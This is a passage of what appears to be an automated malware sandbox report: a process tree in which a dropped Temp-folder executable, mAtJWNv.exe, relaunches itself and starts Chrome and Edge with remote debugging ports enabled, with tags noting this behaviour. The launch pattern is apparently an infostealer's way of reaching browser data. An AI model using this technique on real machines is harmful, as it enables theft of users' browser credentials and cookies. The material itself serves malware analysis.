                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4932,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4972 /prefetch:8
                                                    7⤵
                                                      PID:7128
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4456,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
                                                      7⤵
                                                        PID:5440
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5100 /prefetch:8
                                                        7⤵
                                                          PID:6040
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,9250135288972724109,9232175401315489344,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5288 /prefetch:8
                                                          7⤵
                                                            PID:6372
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                          6⤵
                                                          • Uses browser remote debugging
                                                          • Enumerates system info in registry
                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:4864
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7fff92fb46f8,0x7fff92fb4708,0x7fff92fb4718
                                                            7⤵
                                                            • Checks processor information in registry
                                                            • Enumerates system info in registry
                                                            PID:6948
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                                                            7⤵
                                                              PID:5400
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
                                                              7⤵
                                                                PID:5660
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2676 /prefetch:2
                                                                7⤵
                                                                  PID:5720
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2288 /prefetch:8
                                                                  7⤵
                                                                    PID:5692
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                    7⤵
                                                                    • Uses browser remote debugging
                                                                    PID:3196
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                    7⤵
                                                                    • Uses browser remote debugging
                                                                    PID:3420
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2456 /prefetch:2
                                                                    7⤵
                                                                      PID:6048
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2468 /prefetch:2
                                                                      7⤵
                                                                        PID:6844
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2516 /prefetch:2
                                                                        7⤵
                                                                          PID:6516
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3692 /prefetch:2
                                                                          7⤵
                                                                            PID:7040
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3716 /prefetch:2
                                                                            7⤵
                                                                              PID:5904
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4344 /prefetch:2
                                                                              7⤵
                                                                                PID:6700
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,16853613834566412738,14645936805660324218,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4364 /prefetch:2
                                                                                7⤵
                                                                                  PID:2716
                                                                            • C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3440
                                                                              • C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10126730101\mAtJWNv.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6420
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                  7⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:6964
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7fffa184cc40,0x7fffa184cc4c,0x7fffa184cc58
                                                                                    8⤵
                                                                                      PID:6612
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2324,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2320 /prefetch:2
                                                                                      8⤵
                                                                                        PID:3940
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2576 /prefetch:3
                                                                                        8⤵
                                                                                          PID:3124
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1788,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2716 /prefetch:8
                                                                                          8⤵
                                                                                            PID:4536
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                            8⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:2448
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3248,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3512 /prefetch:1
                                                                                            8⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:4656
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4428 /prefetch:1
                                                                                            8⤵
                                                                                            • Uses browser remote debugging
                                                                                            PID:6524
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4692 /prefetch:8
                                                                                            8⤵
                                                                                              PID:1908
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4288,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
                                                                                              8⤵
                                                                                                PID:4500
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:6196
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5268,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5276 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:5844
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5412,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:3024
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4856 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:1224
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4956,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:6492
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5532,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:2844
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4912,i,10111776529757969219,7319885603987669502,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:2
                                                                                                            8⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:6316
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                          7⤵
                                                                                                          • Uses browser remote debugging
                                                                                                          PID:5720
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fffb00946f8,0x7fffb0094708,0x7fffb0094718
                                                                                                            8⤵
                                                                                                              PID:6468
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
                                                                                                              8⤵
                                                                                                                PID:3520
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
                                                                                                                8⤵
                                                                                                                  PID:6104
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3000 /prefetch:8
                                                                                                                  8⤵
                                                                                                                    PID:4356
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                                                                                                                    8⤵
                                                                                                                    • Uses browser remote debugging
                                                                                                                    PID:6312
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                                                    8⤵
                                                                                                                    • Uses browser remote debugging
                                                                                                                    PID:5452
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:2
                                                                                                                    8⤵
                                                                                                                      PID:2828
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2624 /prefetch:2
                                                                                                                      8⤵
                                                                                                                        PID:5904
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2624 /prefetch:2
                                                                                                                        8⤵
                                                                                                                          PID:6384
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2396 /prefetch:2
                                                                                                                          8⤵
                                                                                                                            PID:228
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
